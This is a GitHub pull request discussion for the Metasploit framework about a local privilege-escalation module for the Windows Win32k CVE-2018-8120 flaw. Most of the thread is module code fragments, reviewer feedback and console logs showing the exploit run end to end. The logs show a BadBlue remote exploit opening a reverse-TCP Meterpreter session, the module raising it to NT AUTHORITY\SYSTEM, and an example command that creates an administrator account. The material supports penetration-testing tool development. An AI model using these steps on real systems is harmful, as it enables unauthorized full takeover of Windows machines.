WIP: Win32k Elevation of Privilege Vulnerability - CVE-2018-8120
rapid7/metasploit-framework pull request #10664
Opened 2018-09-18 07:34 UTC by RootUp

Add CVE-2018-8120 | Win32k Elevation of Privilege Vulnerability

```
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to
properly handle objects in memory. An attacker who successfully exploited this vulnerability 
could run arbitrary code in kernel mode. An attacker could then install programs; view, 
change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would first have to log on to the system. An 
attacker could then run a specially crafted application that could exploit the 
vulnerability and take control of an affected system.
```
## Verification
1.  Start `msfconsole`
2. Get a session
3. `use post/windows/escalate/ms18_8120_win32k_privsec`
4. `set SESSION [SESSION]`
5. `set POCCMD whoami`
6. `run`

## Output
```
msf exploit(windows/http/badblue_passthru) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49202) at 2018-09-18 12:28:19 +0530
[*] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.105:49201) at 2018-09-18 12:28:20 +0530

meterpreter > getuid 
Server username: zero-PC\low
meterpreter > background 
[*] Backgrounding session 2...
msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec 
msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 2
SESSION => 2
msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami
POCCMD => whoami
msf post(windows/escalate/ms18_8120_win32k_privsec) > run

[!] SESSION may not be compatible with this module.
[*] exe name is: t7P0GYY1Lj.exe
[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\t7P0GYY1Lj.exe
[*] Starting module...

[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\t7P0GYY1Lj.exe
[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\t7P0GYY1Lj.exe
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /ad"

[*] Post module execution completed
msf post(windows/escalate/ms18_8120_win32k_privsec) >
```

## Actual output 
```
C:\Users\low.zero-PC\Desktop>t7P0GYY1Lj.exe whoami
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Detected kernel ntoskrnl.exe
[+] Get manager at fffff900c1c5d060,worker at fffff900c21ee060
[+] Triggering vulnerability...
[+] Overwriting...fffff80002a43c38
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 932!
nt authority\system

C:\Users\low.zero-PC\Desktop>
```
However, I am not able to run POCCMD, would request if someone could  suggest what went wrong!
Ping: @bcoles @wvu-r7 @jrobles-r7 @h00die

2018-09-18 07:42 UTC, bcoles commented
I know why, but I'm not going to spoon feed you the answer.

I will, however, give you a hint:

```
[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\t7P0GYY1Lj.exe
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /ad"
```

2018-09-18 07:57 UTC, wvu-r7 commented
`POCCMD` is a lie. You have a bunch of dead code in your module.

2018-09-18 08:00 UTC, bcoles requested changes
Please include source for the executable file. The source should live in the `data` directory with the compiled executable.

2018-09-18 08:10 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +          ['URL', 'https://github.com/unamer/CVE-2018-8120']
Looks like these references are also relevant:

* https://github.com/bigric3/cve-2018-8120
* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html

2018-09-18 09:45 UTC, RootUp commented
## Output

```
msf exploit(windows/http/badblue_passthru) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49214) at 2018-09-18 14:52:55 +0530

meterpreter > getuid 
Server username: zero-PC\low
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec 
msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 1
SESSION => 1
msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami
POCCMD => whoami
msf post(windows/escalate/ms18_8120_win32k_privsec) > run

[!] SESSION may not be compatible with this module.
[*] exe name is: f4MZlRO4LZ.exe
[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe
[*] Starting module..

[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe
[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe whoami
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Detected kernel ntoskrnl.exe
[+] Get manager at fffff900c1a4e720,worker at fffff900c1a52060
[+] Triggering vulnerability...
[+] Overwriting...fffff80002a35c38
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 3516!
nt authority\system

[*] Post module execution completed
msf post(windows/escalate/ms18_8120_win32k_privsec) >
```

Still, passing command such as net user fails over here, I tired passing it like this "net user" but it doesn't gets executes.

2018-09-18 10:16 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +      'References'  =>
Also `['BID', '104034']`

2018-09-18 10:16 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +      'DisclosureDate' => 'Aug 05 2018',
May 9 2018

2018-09-18 15:38 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +      'Name'        => 'Win32k Elevation of Privilege Vulnerability',
A quick read over the [analysis](https://xiaodaozhi.com/exploit/156.html) indicates this is a null pointer dereference vulnerability in the `SetImeInfoEx` kernel function.

Presuming the analysis is correct, the module should be named something like:

`Windows SetImeInfoEx Win32k NULL Pointer Dereference`

2018-09-18 15:46 UTC, bcoles commented
> Still, passing command such as net user fails over here, I tired passing it like this "net user" but it doesn't gets executes.

You're passing it as `net user` not `"net user"` :

```ruby
      command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
      print_status("Location of CVE-2018-8120.exe is: #{command}")
      command += " "
      command += "#{poccmd}"
```

2018-09-18 15:55 UTC, bcoles submitted a review, later dismissed
Indentation is inconsistent throughout

2018-09-18 15:55 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +         OptString.new('POCCMD', [true, 'The command to run from poc.sct']),
`poc.sct` ?

2018-09-18 15:55 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +      cmdcheck = datastore['CMDCHECK']
unused

2018-09-18 15:55 UTC, bcoles commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +          'unamer', # Exploit PoC
As unamer's exploit is based on bigric3's analysis and exploit, they should also get credit.

```
          'unamer', # Exploit
          'bigric3', # Analysis and exploit
```

2018-09-21 17:19 UTC, RootUp commented
> > Still, passing command such as net user fails over here, I tired passing it like this "net user" but it doesn't gets executes.
> 
> You're passing it as `net user` not `"net user"` :
> 
> ```ruby
>       command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
>       print_status("Location of CVE-2018-8120.exe is: #{command}")
>       command += " "
>       command += "#{poccmd}"
> ```

I tried passing it like this, still net user command didn't work over here!

     command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + " " + "#{poccmd}"
     print_good("Location of CVE-2018-8120.exe is: #{command}")

2018-09-21 17:40 UTC, wvu-r7 commented
@RootUp: Please reread the exploit's usage.

```
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /ad"
```

2018-09-21 19:32 UTC, RootUp commented
## Output

```
msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD net user
POCCMD => net user
msf post(windows/escalate/ms18_8120_win32k_privsec) > run

[!] SESSION may not be compatible with this module.
[+] EXE name is: JbOGEismWI.exe
[*] Reading file from: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe
[*] Writing file to temp
[+] File path on remote system: C:\Users\zero\AppData\Local\Temp\JbOGEismWI.exe
[+] Initiating module...

[+] Location of CVE-2018-8120.exe is: C:\Users\zero\AppData\Local\Temp\JbOGEismWI.exe
[+] Executing command: C:\Users\zero\AppData\Local\Temp\JbOGEismWI.exe "net user"
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Detected kernel ntoskrnl.exe
[+] Get manager at fffff900c1aabca0,worker at fffff900c225fca0
[+] Triggering vulnerability...
[+] Overwriting...fffff80002a32c38
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute net user as SYSTEM...
[+] Process created with pid 2400!

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    low                      
zero                     
The command completed with one or more errors.


[*] Post module execution completed
msf post(windows/escalate/ms18_8120_win32k_privsec) >
```

2018-09-22 05:40 UTC, bcoles commented
Is there a reason this was implemented as a `post/windows/escalate` module, rather than a `exploit/windows/local` exploit module?

It seems like most of the hard work has already been done by the author of `CVE-2018-8120.exe`.

2018-09-22 07:45 UTC, RootUp commented
I am still looking around other modules implementation from `exploit/windows/local` once completed, I would prefer doing a another PR for it.  So for now thought of going with `post/windows/escalate`

2018-09-22 08:09 UTC, bcoles commented
There's not much point in including the same module twice.

The module should be pretty easy to port from `escalate` to `local`.

2018-10-03 16:24 UTC, space-r7 requested changes

2018-10-03 16:30 UTC, space-r7 commented on documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md
> +3. `use post/windows/escalate/ms18_8120_win32k_privsec`
The documentation should go in `documentation/modules/exploit/windows/local` to match the new location of the module.

2018-10-03 16:32 UTC, wvu-r7 commented
@RootUp: You're still adding two modules in this PR.

2018-10-03 16:43 UTC, wvu submitted a review, later dismissed

2018-10-03 16:43 UTC, wvu-r7 commented on modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
> +##
You should remove this file.

2018-10-03 16:43 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +    rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe')
Did you compile this binary yourself? Or are you using the precompiled binary at https://github.com/unamer/CVE-2018-8120? That would not be cool for inclusion in Framework. :-)

2018-10-03 16:43 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      fd = session.fs.file.new(temprexe, "wb")
You should use the `Post` API if you're going to include it.

2018-10-03 16:43 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +     end
No `rescue`?

2018-10-03 16:43 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      ::IO.read(exec)
Wat.

2018-10-03 16:43 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +     command += "\"#{poccmd}\""
What are you doing with `poccmd`? It doesn't look like this exploit executes a payload.

2018-10-03 16:47 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      ::IO.read(exec)
Just use `File.read` and change the name to something that isn't reserved.

2018-10-03 17:40 UTC, RootUp commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +     command += "\"#{poccmd}\""
Thank you @space-r7 @wvu-r7 for the review, 

The POCCMD and the module working for now is something like this, https://github.com/rapid7/metasploit-framework/pull/10664#issuecomment-423647824 what ever CMD is passed will run as a system, I found this to code easy and  thought of putting in `/post/windows/escalate` 

https://github.com/rapid7/metasploit-framework/pull/10664#issuecomment-423726206 However, I am still looking out on working and implementation of other modules in `/exploit/windows/local` but have not able to do much yet!

2018-10-03 17:45 UTC, wvu-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +     command += "\"#{poccmd}\""
Cool, let us know if you have any questions! Thanks for sticking this through. :)

2018-10-04 09:35 UTC, RootUp commented
## Output

```
msf exploit(windows/http/badblue_passthru) > run

[*] Started reverse TCP handler on 192.168.1.103:4444 
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.105:49209) at 2018-10-04 14:45:40 +0530

meterpreter > getuid 
Server username: zero-PC\zero
meterpreter > sysinfo 
Computer        : ZERO-PC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(windows/http/badblue_passthru) > use exploit/windows/local/ms18_8120_win32k_privsec 
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms18_8120_win32k_privsec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(windows/local/ms18_8120_win32k_privsec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.1.103:4444 
[*] Sending stage (206403 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.105:49210) at 2018-10-04 14:46:28 +0530
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ms18_8120_win32k_privsec) > sessions -i 

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  zero-PC\zero @ ZERO-PC         192.168.1.103:4444 -> 192.168.1.105:49209 (192.168.1.105)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ ZERO-PC  192.168.1.103:4444 -> 192.168.1.105:49210 (192.168.1.105)

msf exploit(windows/local/ms18_8120_win32k_privsec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo 
Computer        : ZERO-PC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

However, I am still not able to catch why `[-] Exploit failed: Rex::TimeoutError Operation timed out.` but I sill get a session open with NT_Authority and also able to interact with it, please suggest! 
cc: @bcoles @wvu-r7 @space-r7

2018-10-05 15:53 UTC, space-r7 commented
Try `setg loglevel 3` and post the call stack you get by issuing `log` in msfconsole.

2018-10-05 16:40 UTC, RootUp commented
> Try `setg loglevel 3` and post the call stack you get by issuing `log` in msfconsole.

```
[!] LocalPager or $PAGER/$MANPAGER should be set. Falling back on tail -n 24.
[10/05/2018 22:03:40] [i(0)] core: windows/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder x86/call4_dword_xor (size is 392)
[10/05/2018 22:08:42] [e(0)] core: Exploit failed (windows/local/ms18_8120_win32k_privsec): Rex::TimeoutError Operation timed out.
[10/05/2018 22:08:42] [d(3)] core: Call stack:
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/post/meterpreter/packet_dispatcher.rb:225:in `send_request'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/post/meterpreter/channel.rb:190:in `_read'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/post/meterpreter/channel.rb:167:in `read'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/post/meterpreter/channels/pool.rb:77:in `read'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/core/post/common.rb:92:in `cmd_exec'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb:123:in `exploit'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/core/exploit_driver.rb:167:in `run'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/base/simple/exploit.rb:137:in `exploit_simple'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/base/simple/exploit.rb:162:in `exploit_simple'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/ui/text/dispatcher_shell.rb:491:in `run_command'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/ui/text/dispatcher_shell.rb:453:in `block in run_single'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/ui/text/dispatcher_shell.rb:447:in `each'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/ui/text/dispatcher_shell.rb:447:in `run_single'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/rex/ui/text/shell.rb:151:in `run'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.14/msfconsole:49:in `<top (required)>'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'
```

2018-10-05 18:53 UTC, wvu-r7 commented
You're lucky 24 was enough. I need to bump that to 50.

2018-10-06 13:49 UTC, elibr1212 commented
how i can load this on msfconsle ?
i put that on the folder on msfconsle 
and it is not work 
not add on exploits 
why?
and what i need to do?:)

2018-10-08 08:01 UTC, bcoles commented
What document editor are you using? The code indentation seems to get worse with every commit.

2018-10-08 09:19 UTC, RootUp commented
> What document editor are you using? The code indentation seems to get worse with every commit.

Please have a look again and suggest, I simply use gedit for this!

2018-10-10 14:54 UTC, space-r7 commented
I got a session without the `Rex::TimeoutError` by using `cmd_exec_get_pid` in place of `cmd_exec`, but using that restricts the module to only meterpreter sessions.

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +require 'msf/core/exploit/exe'
This is not needed

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +  include Msf::Post::Common
This can also be removed.

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +    rexename =  Rex::Text.rand_text_alphanumeric(10) + ".exe"
Use string interpolation here:   `rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"`

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      cmd = tempdir + "\\" + tempexename + ".exe"
`cmd = "#{tempdir}\\#{tempexename}.exe"` here.

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      raw = create_payload_from_file rexe
Do `raw = create_payload_from_file(rexe)` for consistency.

2018-10-10 15:15 UTC, space-r7 commented on modules/exploits/windows/local/ms18_8120_win32k_privsec.rb
> +      command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
Do `command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"`

2018-10-10 16:01 UTC, RootUp commented
Thank you @space-r7 
However, it still generates the below error

```
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Sending stage (206403 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:51365) at 2018-10-10 21:28:27 +0530

meterpreter > getuid 
Server username: zero-PC\zero
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec 
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(windows/local/ms18_8120_win32k_privsec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference
[-] Exploit failed: TypeError no implicit conversion of Fixnum into String
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ms18_8120_win32k_privsec) > sessions 

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  zero-PC\zero @ ZERO-PC  192.168.1.102:4444 -> 192.168.1.103:51365 (192.168.1.103)

msf exploit(windows/local/ms18_8120_win32k_privsec) > 

```

2018-10-10 16:10 UTC, space-r7 commented
@RootUp `cmd_exec_get_pid` doesn't return a string, but you're passing it to a function that accepts a string.
```
    command_output = cmd_exec_get_pid(command)
    print_line(command_output)
```

2018-10-10 16:27 UTC, RootUp commented
Arrgh! My bad.

```
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Sending stage (206403 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:56748) at 2018-10-10 21:55:52 +0530

meterpreter > getuid 
Server username: zero-PC\zero
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec 
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(windows/local/ms18_8120_win32k_privsec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (206403 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.103:56749) at 2018-10-10 21:56:35 +0530

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

2018-10-10 17:02 UTC, RootUp commented
Tested against windows server 2008 R2 standard x64

```
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] Sending stage (206403 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49183) at 2018-10-10 22:31:07 +0530

meterpreter > getuid 
Server username: WIN-HM3GMNS3FKC\jhon
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec 
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(windows/local/ms18_8120_win32k_privsec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference
[*] Sending stage (206403 bytes) to 192.168.1.105
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.105:49184) at 2018-10-10 22:31:41 +0530

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```

2018-10-11 19:22 UTC, space-r7 commented
I went ahead and added the ability to target 32 bit systems as well and added the source for the executable. I'll go ahead and push to your branch so the module can go through another review.

2018-10-12 00:41 UTC, bcoles reviewed
Please use register_file_for_cleanup

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +      'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
This is unlikely to work as intended. Execution will continue as there is no `return`.

```ruby
    elsif sys_arch == ARCH_X64
      return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86

      'CVE-2018-8120x64.exe'
    else
```

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    raw = create_payload_from_file(rexe)
Defining a method to wrap `File.read` seems a little excessive

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
`rand_text_alpha` supports a range:

```ruby
rand_text_alpha(6..14)
```

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    command << " #{cmd}"
Hopefully the `%TEMP%` path never includes spaces, else this would fail horribly due to unquoted args.

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    if sysinfo['OS'] =~ /XP/
Would a NT version check make more sense? Presumably this doesn't work on Windows 98 either.

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    begin
rescue-from-method technique could be used here.

2018-10-12 00:41 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    write_file(cmd, exe)
Why is `write_file` used here, but a local `write_file_to_target` method which wraps `session.fs.file.new` used elsewhere?

2018-10-13 04:20 UTC, RootUp commented
Tested against Windows 7 x64

```
msf exploit(windows/local/ms18_8120_win32k_privsec) > sessions 

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  zero-PC\msfdev @ ZERO-PC  192.168.1.102:4444 -> 192.168.1.104:49159 (192.168.1.104)

msf exploit(windows/local/ms18_8120_win32k_privsec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (206403 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.104:49160) at 2018-10-13 09:46:51 +0530

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

@space-r7 @bcoles  please suggest are we good to land!

2018-10-13 04:28 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    if sysinfo['OS'] =~ /XP/
`    if sysinfo['OS'] =~ /XP|NT/i`

^ that's not quite what I meant. Not sure if matching `XP` will false match? I meant checking if the NT version is `6.1`, `6.2`, etc. But none of the other modules seem to do this, so whatever.

2018-10-13 04:44 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    rescue
Should be indented in line with the `def` and `end`

2018-10-13 04:44 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    rescue AccessDeniedError
`register_file_for_cleanup` simply adds the file to a list of files to be automatically cleaned up in the `cleanup` method upon module completion. It should never `raise`.

2018-10-13 04:44 UTC, bcoles commented on modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
> +    cve_fname = check_arch
As you're detecting the architecture, you could probably implement automatic targeting too.

Here's an example module which implements auto targeting:

* https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local/ms16_075_reflection.rb

Something like:

```ruby
      'Targets'        =>
        [
          ['Automatic', {}],
          [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
          [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
        ],

# ...

  def assign_target
    return target unless target.name == 'Automatic'

    case sysinfo["Architecture"]
    when 'x86'
      vprint_status("Found we are on an x86 target")
      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
      return targets[1]
    when 'x64'
      vprint_status("Found we are on an x64 target")
      return targets[2]
    end
  end

  def exploit
    # ...

    my_target = assign_target

